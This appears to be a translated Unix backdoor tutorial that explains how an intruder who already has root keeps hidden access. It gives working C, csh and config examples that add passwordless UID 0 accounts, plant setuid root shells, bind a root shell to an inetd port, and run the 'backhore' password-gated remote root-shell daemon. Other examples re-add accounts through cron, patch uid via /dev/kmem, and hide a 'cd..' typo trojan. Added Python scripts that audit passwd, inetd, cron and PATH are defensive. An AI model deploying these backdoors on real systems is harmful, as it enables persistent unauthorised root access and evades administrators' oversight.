Author: tiger (original article)

[Password file]

The easiest method is to add a UID 0 account to the password file /etc/passwd. But don't do this: as soon as the system administrator checks the password file, it will "leak stuff". The following C program appends a UID 0 account to /etc/passwd.

< > backdoor/backdoor1.c
#include <stdio.h>

/* Append an entry to /etc/passwd: login hax0r, empty password field,
 * UID 0, GID 0, home /root, shell /bin/sh. Must already be root to write. */
int main(void)
{
    FILE *fd;

    fd = fopen("/etc/passwd", "a");
    if (fd == NULL)
        return 1;
    fprintf(fd, "hax0r::0:0::/root:/bin/sh\n");
    fclose(fd);
    return 0;
}
<->

A slightly more hidden variant is to change the UID of an existing, inconspicuous account in the password file to 0 and set its second field (the password field) to empty. (Note that on newer *NIX versions you may also have to modify /etc/shadow, since the password hash lives there.)

[Suid shell]

Place a suid shell in the /tmp directory. From then on, whenever you run this program you easily get root privileges. This approach is almost the most popular. However, many systems clear /tmp every hour or at every boot, and some systems do not allow suid programs under /tmp (the filesystem is mounted nosuid). Of course, you can modify or remove these restrictions, because you are already root and have permission to edit /var/spool/cron/crontabs/root and /etc/fstab. The following C program places a suid shell in /tmp.

< > backdoor/backdoor2.c
#include <stdlib.h>

/* Copy the system shell to /tmp, make it root-owned and set the setuid bit.
 * chown is done before chmod: changing the owner clears setuid on most systems. */
int main(void)
{
    system("cp /bin/sh /tmp/fid");
    system("chown root.root /tmp/fid");
    system("chmod 4755 /tmp/fid");
    return 0;
}
<->

______________________________________________________________

[inetd]

System administrators generally check the password file often, so that is a "good" place for a back door. :) So how do you build a better one here? Remotely, of course: that way you don't need a local account at all to become root.
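Checking a system for the two back doors above (an extra UID 0 entry, an emptied password field, a setuid-root shell in /tmp) is mostly a matter of reading two text files carefully. The following Python script is an added example written for this page, not code from the article: it parses passwd and shadow contents, reports every UID 0 login other than those in an allow-list, every empty password field or hash, and walks a directory for setuid-root files, including dot-files such as /tmp/.sh that a plain ls hides. The sample passwd/shadow contents are constructed; the allowed_uid0 list and the scan directory are assumptions.

```python
"""Audit passwd/shadow text and a directory for the back doors above.
Editor's added example; sample file contents below are constructed."""
import os
import stat

# Constructed sample: "nobody" has had its UID changed to 0 and its password
# field emptied, and a "hax0r" line has been appended. In shadow, alice's
# hash has been blanked.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
nobody::0:65534:nobody:/nonexistent:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
hax0r::0:0::/root:/bin/sh
"""

SAMPLE_SHADOW = """\
root:$6$saltsalt$hashhash:19000:0:99999:7:::
alice::19000:0:99999:7:::
"""


def audit_passwd(passwd_text, shadow_text=None, allowed_uid0=("root",)):
    """Return a list of findings for passwd (and optionally shadow) contents."""
    findings = []
    seen = set()
    for lineno, line in enumerate(passwd_text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append("passwd line %d: malformed entry (%d fields)"
                            % (lineno, len(fields)))
            continue
        login, pw, uid, gid, gecos, home, shell = fields
        if login in seen:
            findings.append("passwd line %d: duplicate login %s" % (lineno, login))
        seen.add(login)
        if not uid.isdigit():
            findings.append("passwd line %d: non-numeric uid %r for %s"
                            % (lineno, uid, login))
            continue
        if int(uid) == 0 and login not in allowed_uid0:
            findings.append("passwd line %d: uid 0 account %s (shell %s)"
                            % (lineno, login, shell))
        if pw == "":
            findings.append("passwd line %d: empty password field for %s"
                            % (lineno, login))
    if shadow_text is not None:
        for lineno, line in enumerate(shadow_text.splitlines(), 1):
            if not line.strip():
                continue
            fields = line.split(":")
            if len(fields) < 2:
                findings.append("shadow line %d: malformed entry" % lineno)
            elif fields[1] == "":
                findings.append("shadow line %d: empty password hash for %s"
                                % (lineno, fields[0]))
    return findings


def is_suid_root(mode, uid):
    """True for a regular file with the setuid bit that is owned by uid 0."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0


def scan_suid_root(directory):
    """List setuid-root files under a directory (dot-files included)."""
    hits = []
    for dirpath, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if is_suid_root(st.st_mode, st.st_uid):
                hits.append(path)
    return sorted(hits)


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(finding)
    for path in scan_suid_root("/tmp"):
        print("setuid root file:", path)
```

On a live system pass the real file contents (`open("/etc/passwd").read()`, and /etc/shadow as root) and point scan_suid_root at /tmp, /var/tmp and the bin directories; the equivalent one-liner for the UID check is `awk -F: '$3 == 0' /etc/passwd`, but the script also catches the emptied password field that the "hidden" variant relies on.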
First, let's understand the basics. The inetd process listens for connection requests on the various TCP and UDP ports and launches the corresponding server process for each request. Its configuration file /etc/inetd.conf is very simple; the basic form is:

(1)       (2)     (3)      (4)     (5)   (6)               (7)
ftp       stream  tcp      nowait  root  /usr/etc/ftpd     ftpd
talk      dgram   udp      wait    root  /usr/etc/ntalkd   ntalkd
mountd/1  stream  rpc/tcp  wait    root  /usr/etc/mountd   mountd

1: The first column is the service name. The service name is mapped to a port number by looking it up in /etc/services (for TCP and UDP services) or via the portmap daemon (for RPC services). RPC (Remote Procedure Call) services are identified by the name/number format of the first column and the rpc tag in the third column.

2: The second column determines the socket type used by the service: stream, dgram or raw. Generally stream is used for TCP services and dgram for UDP; raw is rare.

3: The third column identifies the transport protocol used by the service. The allowed types are listed in /etc/protocols. The protocol is almost always tcp or udp. RPC services carry an rpc/ prefix in the protocol column.

4: If the daemon handles multiple requests itself (instead of exiting after each one), the fourth column should be wait, which prevents inetd from continually forking new copies of the daemon; this is used for services that handle a large number of small requests. Otherwise, put nowait in this column.

5: The fifth column gives the user name the daemon runs as.

6: The sixth column gives the fully qualified path name of the daemon.

7: The seventh column gives the daemon's name (its argv[0]) and its arguments. If the work to be done is trivial (no user interaction needed), inetd handles it itself; the sixth and seventh columns then contain only "internal".

So, to install a convenient back door, pick a service that is not used and replace its daemon with one that produces some kind of back door, for example one that adds a UID 0 account or copies a suid shell. An even better way is to replace the daytime service, which provides the date and time, with something that produces a root shell. Just change its line in /etc/inetd.conf to:

daytime stream tcp nowait root /bin/sh sh -i

Then make inetd re-read its configuration (remember: you must do this, or the change has no effect):

killall -HUP inetd

(SIGHUP makes inetd reload inetd.conf; killing it with -9 would only terminate it, and you would then have to start it again by hand.) Anyone who connects to port 13 now gets an interactive root shell, with no authentication at all.

A better and more hidden method is to fake a network service that provides us with a back door of its own, with password protection and so on. If you can get remote access without going through telnetd, so much the better. The method is to bind "your own" daemon to a port. It gives no prompt to an outside connection, but as long as the correct password is typed directly, you get straight into the system.
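To check an inetd.conf for exactly the kind of entry just described, here is an added Python example (editor's code, not part of the original article). It parses the seven-field format explained above, resolves each non-RPC service through /etc/services, and flags entries whose daemon is a shell or interpreter, as well as service names that were never registered in /etc/services (the sign of a line appended to inetd.conf by hand). The sample config and services contents are constructed, and the INTERPRETERS set is an assumption to extend for your own systems.

```python
"""Audit inetd.conf text against /etc/services text. Editor's added example;
the sample files below are constructed, with the daytime replacement from the
article plus an appended 'backdoor' service that is not in /etc/services."""

SAMPLE_INETD_CONF = """\
# <service> <socket> <proto> <wait/nowait> <user> <path> <args>
ftp      stream  tcp  nowait  root  /usr/sbin/in.ftpd     in.ftpd
telnet   stream  tcp  nowait  root  /usr/sbin/in.telnetd  in.telnetd
talk     dgram   udp  wait    root  /usr/sbin/in.ntalkd   in.ntalkd
echo     stream  tcp  nowait  root  internal
daytime  stream  tcp  nowait  root  /bin/sh  sh -i
backdoor stream  tcp  nowait  root  /bin/sh  sh -i
"""

SAMPLE_SERVICES = """\
ftp      21/tcp
telnet   23/tcp
talk     517/udp
echo     7/tcp
daytime  13/tcp
"""

# Daemon basenames that mean "inetd hands the socket straight to an
# interpreter". Assumed list; extend it for the systems you audit.
INTERPRETERS = {"sh", "csh", "ksh", "bash", "zsh", "perl", "python"}


def parse_services(text):
    """Map (service name or alias, protocol) -> port number."""
    known = {}
    for line in text.splitlines():
        parts = line.split("#", 1)[0].split()
        if len(parts) < 2 or "/" not in parts[1]:
            continue
        port, proto = parts[1].split("/", 1)
        if not port.isdigit():
            continue
        for name in [parts[0]] + parts[2:]:
            known[(name, proto)] = int(port)
    return known


def audit_inetd(conf_text, services_text):
    """Return [(line number, finding)] for an inetd.conf given as a string."""
    known = parse_services(services_text)
    findings = []
    for lineno, raw in enumerate(conf_text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 6:
            findings.append((lineno, "malformed entry: %r" % raw))
            continue
        name, socktype, proto, wait, user, path = fields[:6]
        port = None
        # RPC names are "prog/version", resolved by portmap, not /etc/services
        if not proto.startswith("rpc/"):
            port = known.get((name, proto))
            if port is None:
                findings.append((lineno, "service %s/%s is not in /etc/services"
                                 % (name, proto)))
        if path == "internal":
            continue
        daemon = path.rsplit("/", 1)[-1]
        if daemon in INTERPRETERS:
            where = "port %d" % port if port is not None else "an unregistered port"
            findings.append((lineno, "%s hands %s to %s as %s: whoever connects gets a shell"
                             % (name, where, path, user)))
    return findings


if __name__ == "__main__":
    for lineno, finding in audit_inetd(SAMPLE_INETD_CONF, SAMPLE_SERVICES):
        print("inetd.conf line %d: %s" % (lineno, finding))
```

Run it on the real files with `audit_inetd(open("/etc/inetd.conf").read(), open("/etc/services").read())`; a clean configuration returns an empty list. Comparing the daemon paths it prints against a known-good copy of the file catches the quieter variant where a legitimate daemon binary is swapped for a trojaned one at the same path.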
The following is a demonstration program of this kind of back door. (Note: this program is not very complete.)

< > backdoor/remoteback.c
/*
 * Coders: Theft
 * Help from: Sector9, Halogen
 * Greets:
 *   People: Liquid, AntiSocial, Peak, Grimknight, s0ttle, halogen, Psionic, g0d
 *   Groups: Ethical Mutiny Crew (EMC), Common Purpose Hackers (CPH),
 *           Global Hell (GH), Team Sploit, Hong Kong Danger Duo, TG0D, EHAP.
 *
 * Usage:
 *   setup: # gcc -o backhore backhore.c
 *          # ./backhore password &
 *   run:   telnet to the host on port 4000. After connecting you will not be
 *          prompted for a password (this way it is less obvious); just type
 *          the password and press enter. After this you will be prompted for
 *          a command, pick 1-8.
 *
 * Distributers: Ethical Mutiny Crew
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define PORT 4000
#define MAXDATASIZE 100
#define BACKLOG 10
#define SA struct sockaddr

void handle(int);

int main(int argc, char *argv[])
{
    int sockfd, new_fd, cmd;
    socklen_t sin_size;
    char ask[] = "Command: ";
    char buf[MAXDATASIZE], pass[40];
    struct sockaddr_in my_addr;
    struct sockaddr_in their_addr;

    printf("\nbackhore beta by theft\n");
    printf("1: trojans rc.local\n");
    printf("2: sends a systemwide message\n");
    printf("3: binds a root shell on port 2000\n");
    printf("4: creates suid sh in /tmp\n");
    printf("5: creates mutiny account uid 0 no passwd\n");
    printf("6: drops to suid shell\n");
    printf("7: information on backhore\n");
    printf("8: contact\n");

    if (argc != 2) {
        fprintf(stderr, "usage: %s password\n", argv[0]);
        exit(1);
    }
    strncpy(pass, argv[1], sizeof(pass) - 1);
    pass[sizeof(pass) - 1] = '\0';
    printf("..using password: %s..\n", pass);

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket");
        exit(1);
    }
    memset(&my_addr, 0, sizeof(my_addr));
    my_addr.sin_family = AF_INET;
    my_addr.sin_port = htons(PORT);
    my_addr.sin_addr.s_addr = INADDR_ANY;

    if (bind(sockfd, (SA *)&my_addr, sizeof(my_addr)) == -1) {
        perror("bind");
        exit(1);
    }
    if (listen(sockfd, BACKLOG) == -1) {
        perror("listen");
        exit(1);
    }
    sin_size = sizeof(their_addr);

    while (1) { /* main accept() loop */
        if ((new_fd = accept(sockfd, (SA *)&their_addr, &sin_size)) == -1) {
            perror("accept");
            continue;
        }
        if (!fork()) {
            /* child: tie stdin/stdout/stderr to the connection */
            dup2(new_fd, 0);
            dup2(new_fd, 1);
            dup2(new_fd, 2);
            /* no prompt is sent; read one line and strip the CR/LF telnet adds,
             * otherwise the comparison with the password could never match */
            if (fgets(buf, sizeof(buf), stdin) != NULL) {
                buf[strcspn(buf, "\r\n")] = '\0';
                if (!strcmp(buf, pass)) {
                    printf("%s", ask);
                    fflush(stdout);
                    cmd = getchar();
                    handle(cmd);
                }
            }
            close(new_fd);
            exit(0);
        }
        close(new_fd);
        while (waitpid(-1, NULL, WNOHANG) > 0)
            ; /* reap the dying children */
    }
}

void handle(int cmd)
{
    FILE *fd;

    switch (cmd) {
    case '1':
        printf("\nbackhore beta by theft\n");
        printf("theft@cyberspace.org\n");
        printf("Trojaning rc.local\n");
        /* despite the label, this appends a UID 0 account to /etc/passwd */
        fd = fopen("/etc/passwd", "a");
        fprintf(fd, "mutiny::0:0:Ethical Mutiny Crew:/root:/bin/sh\n");
        fclose(fd);
        printf("Trojan complete.\n");
        break;
    case '2':
        printf("\nbackhore beta by theft\n");
        printf("theft@cyberspace.org\n");
        printf("Sending systemwide message..\n");
        system("wall Box Owned Via The Ethical Mutiny Crew");
        printf("Message sent.\n");
        break;
    case '3':
        printf("\nbackhore beta by theft\n");
        printf("theft@cyberspace.org\n");
        printf("\nAdding inetd backdoor... (-p)\n");
        /* register a service name, point it at a root shell, then make
         * inetd reload; both files are closed first so the lines are
         * actually on disk when inetd re-reads them */
        fd = fopen("/etc/services", "a");
        fprintf(fd, "backdoor\t2000/tcp\tbackdoor\n");
        fclose(fd);
        fd = fopen("/etc/inetd.conf", "a");
        fprintf(fd, "backdoor\tstream\ttcp\tnowait\troot\t/bin/sh\tsh -i\n");
        fclose(fd);
        system("killall -HUP inetd");
        printf("\nDone.\n");
        printf("Telnet to port 2000\n\n");
        break;
    case '4':
        printf("\nbackhore beta by theft\n");
        printf("theft@cyberspace.org\n");
        printf("\nAdding suid shell... (-s)\n");
        /* chown before chmod (chown clears setuid); 4755 rather than 4700,
         * since a mode of 4700 would be runnable by root only */
        system("cp /bin/sh /tmp/.sh");
        system("chown root:root /tmp/.sh");
        system("chmod 4755 /tmp/.sh");
        printf("\nSuid shell added.\n");
        printf("Execute /tmp/.sh\n\n");
        break;
    case '5':
        printf("\nbackhore beta by theft\n");
        printf("theft@cyberspace.org\n");
        printf("\nAdding root account... (-u)\n");
        fd = fopen("/etc/passwd", "a");
        fprintf(fd, "hax0r::0:0::/:/bin/bash\n");
        fclose(fd);
        printf("\nDone.\n");
        printf("UID 0 and GID 0 account added\n\n");
        break;
    case '6':
        printf("\nbackhore beta by theft\n");
        printf("theft@cyberspace.org\n");
        printf("Executing suid..\n");
        execl("/bin/sh", "sh", "-i", (char *)0);
        break;
    case '7':
        printf("\nbackhore beta by theft\n");
        printf("theft@cyberspace.org\n");
        printf("\nInfo...\n");
        printf("\n3 - adds entries to /etc/services & /etc/inetd.conf giving you\n");
        printf("a root shell on port 2000. example: telnet <host> 2000\n\n");
        printf("4 - creates a copy of /bin/sh to /tmp/.sh which, whenever\n");
        printf("executed gives you a root shell. example: /tmp/.sh\n\n");
        printf("5 - adds an account with uid and gid 0 to the passwd file.\n");
        printf("The login is 'mutiny' and there is no passwd.\n");
        break;
    case '8':
        printf("\nbackhore beta by theft\n");
        printf("http://t.bored.org\n");
        printf("theft@cyberspace.org\n\n\n");
        break;
    default:
        printf("Unknown command: %d\n", cmd);
        break;
    }
}
<->

[Cron]

The crontab program is very useful to system administrators. The cron service runs commands at specified times (month, day, weekday, hour, minute). If you are smart enough, you should use it to make a back door too! With cron you can have the back door program run at 2:00 am every day (the admin should be asleep by then), so you can easily enter the system, do what you want, and leave before the admin notices. The root user's crontab file lives in /var/spool/cron/crontabs/root (the exact path varies by system), and its format is as follows:
(1)  (2)  (3)  (4)  (5)  (6)
0    0    *    *    3    /usr/bin/updatedb

1. Minute (0-59)
2. Hour (0-23)
3. Day of month (1-31)
4. Month (1-12)
5. Day of week (0-6, 0 = Sunday; most crons also accept 7 for Sunday)
6. The command to run
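Since a root crontab is just six whitespace-separated fields per line, it is easy to audit mechanically. The following Python is an added example written for this page (not code from the article): it parses root's crontab in the format above, validates each time field against those ranges, and flags jobs that run from temp or hidden paths or whose program is not on a baseline of expected jobs. The sample crontab and the BASELINE set are constructed.

```python
"""Audit a crontab in the six-field format above. Editor's added example;
the sample crontab and baseline below are constructed."""
import re

FIELD_RANGES = (("minute", 0, 59), ("hour", 0, 23), ("day", 1, 31),
                ("month", 1, 12), ("weekday", 0, 7))

# Constructed sample: two normal jobs, a 2 am job with an unknown program,
# a job launching a script from a hidden directory, a job in /tmp, and a
# line with an impossible minute value.
SAMPLE_CRONTAB = """\
# root crontab (constructed sample)
0 0 * * 3 /usr/bin/updatedb
30 4 * * * /usr/sbin/logrotate /etc/logrotate.conf
0 2 * * * /usr/bin/retract
0 2 * * * /bin/csh /root/.x/backdoor.sh
*/5 * * * * /tmp/.fid
60 0 * * * /usr/bin/updatedb
"""

# Programs you expect root's crontab to run (assumed for the sample).
BASELINE = {"/usr/bin/updatedb", "/usr/sbin/logrotate"}

HIDDEN_OR_TEMP = re.compile(r"(^|/)\.[^/]|^(/tmp|/var/tmp|/dev/shm)/")


def _field_ok(value, low, high):
    """Accept '*', '*/n', 'a', 'a-b' and comma lists of those within [low, high]."""
    for part in value.split(","):
        base, _, step = part.partition("/")
        if step and not step.isdigit():
            return False
        if base == "*":
            continue
        bounds = base.split("-", 1)
        if not all(b.isdigit() for b in bounds):
            return False
        nums = [int(b) for b in bounds]
        if any(n < low or n > high for n in nums) or nums != sorted(nums):
            return False
    return True


def audit_crontab(text, baseline=BASELINE):
    """Return [(line number, finding)] for crontab text."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)
        if len(parts) < 6:
            findings.append((lineno, "malformed entry: %r" % raw))
            continue
        for value, (name, low, high) in zip(parts[:5], FIELD_RANGES):
            if not _field_ok(value, low, high):
                findings.append((lineno, "%s field %r out of range" % (name, value)))
        command = parts[5]
        program = command.split()[0]
        if HIDDEN_OR_TEMP.search(command):
            findings.append((lineno, "command uses hidden or temp path: %s" % command))
        if program not in baseline:
            findings.append((lineno, "program not in baseline: %s" % program))
    return findings


if __name__ == "__main__":
    for lineno, finding in audit_crontab(SAMPLE_CRONTAB):
        print("line %d: %s" % (lineno, finding))
```

The baseline check is the one that matters in practice: a back door need not run from /tmp or a dot-directory, but it does have to be a program the administrator did not put there, so diff the program list against what was installed rather than relying on path heuristics alone.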
The updatedb line runs at 00:00 every Wednesday. To plant a back door with cron, just add a back door program to root's crontab. For example, the program can check /etc/passwd every day to make sure the added user account is still there, and put it back if it has been removed. Here is an example; the crontab entry is

0 0 * * * /usr/bin/retract

and the script it runs (installed as /usr/bin/retract) is:
< > backdoor/backdoor.sh
#!/bin/csh
# Re-insert a UID 0 account into the middle of /etc/passwd if it has gone
# missing. Inserting mid-file is a little less obvious than appending.
set evilname = Meb
set evilflag = (`grep "^${evilname}:" /etc/passwd`)
if ($#evilflag == 0) then
    set linecount = `wc -l /etc/passwd`
    cd
    cp /etc/passwd ./temppass
    @ linecount[1] /= 2
    @ linecount[1] += 1
    # split the copy into two halves, xaa and xab
    split -$linecount[1] ./temppass
    echo "${evilname}::0:0:Meb:/root:/bin/sh" >> ./xaa
    cat ./xab >> ./xaa
    mv ./xaa /etc/passwd
    chmod 644 /etc/passwd
    rm ./xa* ./temppass
    echo done...
else
endif
<->

[General]

Of course, we can also write a trojan and put it in the /bin directory. It generates a suid shell when run with a specific command-line argument. Here is an example:
< > backdoor/backdoor3.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define PASS "triad"
#define BUFFERSIZE 6

/* Looks like a broken utility: with any other argument (or none) it prints a
 * bogus error and idles for ten seconds. Only the secret argument plants the
 * suid shell. */
int main(int argc, char *argv[])
{
    int i = 0;

    if (argv[1]) {
        if (!strcmp(PASS, argv[1])) {
            system("cp /bin/csh /bin/.swp121");
            system("chown root /bin/.swp121"); /* chown first: it clears setuid */
            system("chmod 4755 /bin/.swp121");
        }
    }
    printf("372f: invalid control argument, unable to initialize");
    fflush(stdout);
    for (; i < 10; i++) {
        fprintf(stderr, ".");
        sleep(1);
    }
    printf("\nAction aborted after 10 attempts.\n");
    return 0;
}
<->
[Variant]

The following program finds the UID of the running process in kernel memory and changes it to 0, giving you a root shell. It only works on systems where the process's u-area (struct user) is reachable by writing /dev/kmem (old BSD-style kernels and SunOS), and the program itself must already be able to write /dev/kmem, which in practice means it is installed setuid root; its advantage over a plain suid shell is that it is an unremarkable binary whose only privileged action is poking its own credentials, gated behind a password.

< > backdoor/kmemthief.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/user.h>

#define PASS "triad"

struct user userpage;
long userlocation;

/* address() must return the kernel address of this process's u-area
 * (struct user). The article does not include its definition; it is
 * system-specific and has to be supplied for the target kernel. */
long address(void);

int main(int argc, char *argv[], char *envp[])
{
    int count, fd;
    long where;

    if (argv[1]) {
        if (!strcmp(PASS, argv[1])) {
            fd = open("/dev/kmem", O_RDWR);
            if (fd < 0) {
                printf("Cannot read or write to /dev/kmem\n");
                perror(argv[0]);
                exit(10);
            }
            userlocation = address();
            where = lseek(fd, userlocation, 0);
            if (where != userlocation) {
                printf("Cannot seek to user page\n");
                perror(argv[0]);
                exit(20);
            }
            count = read(fd, &userpage, sizeof(struct user));
            if (count != sizeof(struct user)) {
                printf("Cannot read user page\n");
                perror(argv[0]);
                exit(30);
            }
            printf("Current uid: %d\n", (int)userpage.u_ruid);
            printf("Current gid: %d\n", (int)userpage.u_rgid);
            /* patch the real uid/gid in our copy, then write the part of the
             * u-area up to u_procp back into kernel memory */
            userpage.u_ruid = 0;
            userpage.u_rgid = 0;
            where = lseek(fd, userlocation, 0);
            if (where != userlocation) {
                printf("Cannot seek to user page\n");
                perror(argv[0]);
                exit(40);
            }
            write(fd, &userpage,
                  ((char *)&(userpage.u_procp)) - (char *)&userpage);
            execle("/bin/csh", "/bin/csh", "-i", (char *)0, envp);
        }
    }
    return 0;
}
<->
["Dumb" method]

Have you ever typed "cd.." on a UNIX system instead of "cd .."? It is a habit carried over from MS Windows and MS-DOS. Does the admin make this mistake? If so, can we make him do some "contribution" for us, for example activate our trojan whenever he types "cd.."? Then we don't even have to log in to the system to trigger the trojan. The trojan is simply a program named cd.. placed in a directory on the administrator's PATH (such as /bin); because the admin is normally root when he slips, the write to /etc/passwd succeeds. Here is an example:

< > backdoor/dumb.c
/* Adds a UID 0 account to /etc/passwd when the administrator accidentally
 * types "cd.."; install it as /bin/cd.. (or anywhere on root's PATH).
 * The article presents it as also performing the "cd .." for the admin, but
 * a child process cannot change its parent shell's working directory, so the
 * system("cd ..") below has no visible effect; the admin simply sees nothing
 * happen and retypes the command. */
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    FILE *fd;

    fd = fopen("/etc/passwd", "a");
    if (fd != NULL) {
        fprintf(fd, "hax0r::0:0::/root:/bin/sh\n");
        fclose(fd);
    }
    system("cd ..");
    return 0;
}
<->
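The counterpart check for this trick is to look at what is actually executable on PATH. The following Python is an added example written for this page, not code from the article: it walks each PATH directory, reports directories anyone can write to (a place to drop such a file), executables whose names are DOS-style typos of shell builtins such as "cd..", and hidden or oddly named executables. The LOOKALIKE_NAMES set is an assumption; demo() plants constructed files in a temporary directory so the scan can be tried without touching the real PATH.

```python
"""Scan PATH directories for typo-named or hidden executables and for
world-writable directories. Editor's added example; demo() uses constructed
files in a temporary directory."""
import os
import stat
import tempfile

# Names a DOS-habituated administrator types by mistake. A trojan with one of
# these names on PATH runs instead of producing "command not found".
LOOKALIKE_NAMES = {"cd..", "cd.", "ls-l", "ls-la", "ls-al", "rm-rf"}


def scan_path_dirs(path_dirs, lookalikes=LOOKALIKE_NAMES):
    """Return [(path, finding)] for the given directories."""
    findings = []
    for d in path_dirs:
        try:
            st = os.stat(d)
        except OSError:
            continue  # nonexistent PATH entries are common and harmless
        if st.st_mode & stat.S_IWOTH and not st.st_mode & stat.S_ISVTX:
            findings.append((d, "world-writable directory on PATH"))
        for name in sorted(os.listdir(d)):
            full = os.path.join(d, name)
            if not os.path.isfile(full) or not os.access(full, os.X_OK):
                continue
            if name in lookalikes:
                findings.append((full, "executable named like a typo of a shell builtin"))
            elif name.startswith(".") or ".." in name:
                findings.append((full, "hidden or oddly named executable"))
    return findings


def scan_current_path():
    """Scan the PATH of the current process."""
    return scan_path_dirs(os.environ.get("PATH", "").split(os.pathsep))


def plant_demo(directory):
    """Create constructed files: a benign 'ls' and a trojan named 'cd..',
    then make the directory world-writable."""
    for name in ("ls", "cd.."):
        full = os.path.join(directory, name)
        with open(full, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(full, 0o755)
    os.chmod(directory, 0o777)


def demo():
    """Plant the sample files in a fresh temp directory and scan it."""
    d = tempfile.mkdtemp()
    plant_demo(d)
    return scan_path_dirs([d])


if __name__ == "__main__":
    for path, finding in demo():
        print("%s: %s" % (path, finding))
    for path, finding in scan_current_path():
        print("%s: %s" % (path, finding))
```

Run scan_current_path() from root's own environment, since that is the PATH the mistyped command is resolved against; a PATH that contains "." or an empty element is worth reporting as well, because it lets the same trick work from any directory the administrator happens to be in.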